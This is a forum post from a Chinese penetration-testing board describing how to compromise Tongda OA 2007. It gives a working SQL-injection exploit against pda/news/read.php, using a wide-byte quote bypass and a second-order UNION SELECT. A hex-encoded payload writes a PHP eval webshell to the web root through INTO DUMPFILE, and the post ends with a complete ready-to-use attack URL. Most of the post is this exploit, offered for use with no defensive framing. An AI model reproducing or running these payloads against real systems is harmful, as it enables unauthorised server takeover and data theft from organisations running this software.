找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 通达OA2007版本漏洞及getshell
返回列表 发新帖
查看: 2929|回复: 0
打印 上一主题 下一主题

通达OA2007版本漏洞及getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-20 08:09:24 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
目前测试通达OA2007版本/ @! `% U6 G- l
: }6 t5 W( p3 W# n4 S: M$ y
+ c; h+ _1 T( {$ |; E' y% f
Office Anywhere 2007 网络智能办公系统
; c! l: X. D9 Y1 p, F! F, W' P' v3 |
8 R5 f) J- X3 O5 Lhttp://127.0.0.1/pda/news/read.php?P=%cf'    猪点。   暴web目录..
2 O4 L% r! O$ n
/ M) N$ n% x- r
' S( @4 Z: [) P. v) m$ @! M! i: Z这个时候看了下代码,存在注入的那个变量的语句中第3个字段,在该文件下面被另外个select语句调用了,灵光一闪,大概思路是这样的
% f$ u7 B. t+ w' c9 t8 J  U
' f$ @6 T  |6 e7 Z/ m* V例如:SELECT * from USER where USER_ID='{$USERNAME}'  3 b8 w7 ^* {+ z7 E
其中有这么段字段声明$PROVIDER = $ROW['PROVIDER'];被下面个语句$query1 = "SELECT * from USER where USER_ID='{$PROVIDER}'";带入查询了
: H% o/ Q9 g/ A. z2 r+ }
, h8 q4 H- Q; T; l' G1 l这个时候我们是不是可以组合起来使用哪?
7 ?) T7 E4 Z! z- m5 g" Z6 f
, n; C( e6 a7 o, l7 \% Z第一条语句开始注入,union select 1,2,3,4,5,6,7,8,9,10...,比如第3个是PROVIDER字段,我们这样
2 H$ Y  @! J; Xunion select 1,2,'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#,4,5,6,7,8,9,10
' R$ d. X2 J2 ]6 c2 Q' Z0 A
  {0 ]7 R0 m& ~% X7 b. ^这样'UNION SELECT 1,1,1,'<?php eval($v);?>',1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 into dumpfile'B:/m.php'#这个语句就带入第二条语句去写webshell了" D3 \' R/ |+ ]5 k* e* O6 `# k

3 e  j4 o9 ?5 P' i那么问题来了,单引号可以吗?当然是不可以的,^_^。。。
% `/ @5 F* m+ g3 j! l/ ?5 Q 4 w+ [! C, W4 z2 x
那么我们用字符串格式带入进行hex编码, U# g  |  ^" H6 J% {# D" Z1 H

: `* ^4 h" }1 W7 b: J%cf'UNION SELECT 1,2,3,0x27554e494f4e2053454c45435420312c312c312c273c3f706870206576616c282476293b3f3e272c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c312c3120696e746f2064756d7066696c6527423a2f6d2e7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23! |6 ]  U4 |" m+ |" L  I# E

% }# a  @' a, S# c测试ok,获取oa的webshell
. K& t7 J2 `# ~
$ b* e; g- ?9 y! T( w ; L3 K. t! E% H+ ~, ]" r
pda/news/read.php?P=%cf'or%281=1%29%23&NEWS_ID=%cf'UNION SELECT 1,2,3,0x27554E494F4E2053454C45435420312C312C312C273C3F706870206576616C282476293B3F3E272C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C312C3120696E746F2064756D7066696C6527443A2F4D594F412F776562726F6F742F6D2E7068702723,5,6,7,8,9,10,11,12,13,14,15,16%23
. z5 R4 p: \1 c7 d% C; h直接getwebshell
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表